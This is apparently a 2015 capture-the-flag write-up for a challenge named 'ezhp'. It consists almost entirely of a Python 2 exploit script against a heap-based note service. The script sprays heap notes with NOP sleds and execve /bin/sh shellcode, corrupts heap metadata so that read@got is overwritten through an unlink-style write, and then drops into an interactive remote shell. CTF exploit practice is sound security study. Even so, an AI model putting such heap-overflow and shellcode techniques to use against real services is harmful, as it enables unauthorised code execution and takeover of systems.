bata_24

ezhp write-up

Jan 12th, 2015
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. import struct, socket, telnetlib
  4.  
def sock(remoteip, remoteport):
  """Open a TCP connection to (remoteip, remoteport).

  Returns a pair (socket, file): the connected socket itself and an
  unbuffered read/write file object wrapping it (Python 2 makefile
  signature, hence the ``bufsize`` keyword). No timeout is set, so reads
  on the returned file block indefinitely.
  """
  conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  conn.connect((remoteip, remoteport))
  stream = conn.makefile('rw', bufsize=0)
  return conn, stream
  9.  
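def read_until(f, delim='\n'):
  """Read from f one character at a time until the data ends with delim.

  Args:
    f: a file-like object whose read(1) returns one character ('' at EOF).
    delim: the terminator to stop at; it is included in the returned data.
      An empty delim returns '' immediately (''.endswith('') is true).

  Returns:
    Everything read, including delim.

  Raises:
    EOFError: if the stream is exhausted before delim is seen. The original
      loop kept appending empty reads forever in that case, which is what
      showed up as a "hang" on a closed connection; raising instead lets a
      caller's except clause handle it like any other failed attempt.
  """
  data = ''
  while not data.endswith(delim):
    chunk = f.read(1)
    if not chunk:
      # '' from read(1) means the peer closed; spinning here would never end.
      raise EOFError("stream closed before delimiter %r was seen" % (delim,))
    data += chunk
  return data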
  15.  
def shell(s):
  """Hand the already-connected socket s to an interactive telnetlib session.

  An unconnected Telnet object is created and its ``sock`` attribute is
  swapped for s, so ``interact()`` relays the local terminal over the
  existing connection. Does not return until that session ends.
  """
  session = telnetlib.Telnet()
  session.sock = s
  session.interact()
  20.  
def p(a):
  """Pack integer a as a 4-byte little-endian unsigned value.

  Raises struct.error when a is outside 0..0xFFFFFFFF.
  """
  packer = struct.Struct("<I")
  return packer.pack(a)
  23.  
# linux/x86/execve_binsh
# 24-byte payload, reproduced from the write-up unchanged.
shellcode = "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

# Driver for the 'ezhp' challenge service (page title). The service speaks a
# plain-text menu protocol: every step waits for the "Please choose an option."
# prompt and then writes an option number followed by its arguments, one per
# line. The whole attempt sits in a retry loop because, per the except message
# further down, the address assumptions below do not hold on every run; each
# pass opens a fresh connection. Default target is the local port 9174.
while True:
  s, f = sock("localhost", 9174)
  #s, f = sock("katagaitai.orz.hm", 2222)

  # Option 1 with size 10, four times.
  print "[+] make dummy note"
  for i in xrange(4):
    read_until(f, "Please choose an option.\n")
    f.write("1\n10\n")

  # Option 1 with a 0x1100000-byte size, nine times.
  print "[+] make heap"
  for i in xrange(9):
    read_until(f, "Please choose an option.\n")
    sz = 0x1100000
    f.write("1\n"+str(sz)+"\n")

  # Option 3 with second argument 2..10 (presumably a note index) and size
  # 300, each followed by 300 bytes of data: a 4-byte prefix, NOP padding,
  # and the 24-byte payload at the very end.
  print "[+] make shellcode"
  for i in xrange(9):
    sz = 300
    read_until(f, "Please choose an option.\n")
    f.write("3\n"+str(i+2)+"\n" + str(sz) + "\n")
    read_until(f, "Please input your data.\n")
    f.write("\x90\x90\xeb\x10" + "\x90"*(sz-len(shellcode)-4) + shellcode + "\n")

  # Option 3 on index 1 with a declared size of 1024, then option 2 on index 2.
  # The three packed values are hard-coded absolute addresses from the
  # write-up's build of the binary; they are not expected to transfer to any
  # other build.
  print "[+] make pop->pop->ret(rwx) in heap"
  read_until(f, "Please choose an option.\n")
  f.write("3\n1\n1024\n")
  read_until(f, "Please input your data.\n")
  #f.send("A"*12 + p(0xFFFFFFFF) + p(0xBBBBBBBB) + p(0xCCCCCCCC) + "\n")
  f.write("\x90"*12 + p(0xc) + p(0x0804a050-8) + p(0x08c35d5d) + "\n") # 5d = pop ebp; c3 = ret;
  read_until(f, "Please choose an option.\n")
  f.write("2\n2\n")

  # Option 3 on index 0 with declared size 1024, then option 2 on index 1.
  # The bare except is deliberate here: it also catches the KeyboardInterrupt
  # from the Ctrl+C the message asks for (and any socket error), prints the
  # failure line and restarts the outer loop with a new connection instead of
  # exiting the script.
  print "[+] rewrite read@got (if hang-up, press Ctrl+C)"
  try:
    read_until(f, "Please choose an option.\n")
    f.write("3\n0\n1024\n")
    read_until(f, "Please input your data.\n")
    f.write("\xeb\x40" + "\x90"*10 + p(0xc) + p(0x0804a000-8) + p(0x0804a050) + "\n")
    read_until(f, "Please choose an option.\n")
    f.write("2\n1\n")
  except:
    print "[-] malloc-ed address is not so good..."
    continue

  # Option 3 on index 0 with size 100. No data is written after the
  # "Please input your data." prompt; the socket is handed straight to the
  # interactive session below.
  print "[+] tirgger"
  read_until(f, "Please choose an option.\n")
  f.write("3\n0\n100\n")
  read_until(f, "Please input your data.\n")

  print "got shell :)"
  shell(s)